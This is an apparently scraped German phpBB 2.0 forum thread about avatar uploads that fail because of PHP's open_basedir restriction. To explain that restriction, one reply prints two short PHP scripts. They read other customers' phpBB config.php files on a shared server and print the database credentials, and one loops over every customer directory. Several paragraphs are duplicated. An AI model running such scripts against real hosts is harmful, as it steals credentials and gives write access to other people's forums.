Avatare gehen nicht mehr hochzuladen...
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
-
TranceRulez
- Mitglied
- Beiträge: 65
- Registriert: 01.09.2002 11:03
Avatare gehen nicht mehr hochzuladen...
Zuletzt geändert von TranceRulez am 28.08.2006 11:53, insgesamt 1-mal geändert.
-
TranceRulez
- Mitglied
- Beiträge: 65
- Registriert: 01.09.2002 11:03
-
TranceRulez
- Mitglied
- Beiträge: 65
- Registriert: 01.09.2002 11:03
-
easydive
-
Gast
open_basedir restriction ist ein Sicherheitstool für paranoide Administratoren. Theoretisch ist es ja möglich, mittels php Dateisystemfunktionen die komplette Festplatte auszulesen, oder z.B. Kennwörter auszuspähen. Beispiel: Ich bin auf einem Shared Server und meine Daten befinden sich im Verzeichnis
home/htdocs/12345/
Ein anderer Kunde auf demselben Rechner hat ein phpBB installiert, durch eine Fehlermeldung kann z.B. jederzeit das Verzeichnis festgestellt werden. Ich schreibe nun ein php script:
Oder was haltet ihr davon:
spioniert *alle* Kennwörter aller phpBB aller Kunden aus, die eine 5-stellige Kundennummer haben und ein phpBB2 im Hauptverzeichnis installiert haben. Ich kann also jederzeit vollen (Schreib-)Zugriff auf all diese Datenbanken erhalten und z.B. Anonymous zum Admin umschreiben.
Dort kommt nun die open_basedir restriction ins Spiel. Die verhindert, daß php auf jedwede Dateien ausserhalb des Pfades /home/htdocs/12345/ zugreifen kann. PHP lädt allerdings die Avatare ins Temporärverzeichnis des Rechners (wird in der php conf eingestellt). Versucht phpBB nun einen Zugriff auf /tmp/dateiname.gif wird der Befehl verweigert, siehe Fehlermeldungen.
Einzige Lösung: PHP muß so eingestellt werden, daß die Dateien in einem Unterverzeichnis des Webspace gespeichert werden, denn hier funktionieren alle Dateifunktionen ja einwandfrei. Das muß aber der Administrator eures ISP machen.
home/htdocs/12345/
Ein anderer Kunde auf demselben Rechner hat ein phpBB installiert, durch eine Fehlermeldung kann z.B. jederzeit das Verzeichnis festgestellt werden. Ich schreibe nun ein php script:
Code: Alles auswählen
<HTML><HEAD></HEAD><BODY>
<?php
include("/home/htdocs/54321/phpBB2/config.php");
echo $dbhost . "<BR>". $dbname . "<BR>" . $dbuser . "<BR>" . $dbpass;
?>
</BODY></HTML>
Code: Alles auswählen
<HTML><HEAD></HEAD><BODY>
<?php
for ($i=10000; $i < 100000; $i++) {
unset($dbhost);
include("/home/htdocs/" . $i . "/config.php");
if (isset($dbhost))
echo $i . ":" . $dbhost . "<BR>". $dbname . "<BR>" . $dbuser . "<BR>" . $dbpass;
?>
</BODY></HTML>
Dort kommt nun die open_basedir restriction ins Spiel. Die verhindert, daß php auf jedwede Dateien ausserhalb des Pfades /home/htdocs/12345/ zugreifen kann. PHP lädt allerdings die Avatare ins Temporärverzeichnis des Rechners (wird in der php conf eingestellt). Versucht phpBB nun einen Zugriff auf /tmp/dateiname.gif wird der Befehl verweigert, siehe Fehlermeldungen.
Einzige Lösung: PHP muß so eingestellt werden, daß die Dateien in einem Unterverzeichnis des Webspace gespeichert werden, denn hier funktionieren alle Dateifunktionen ja einwandfrei. Das muß aber der Administrator eures ISP machen.
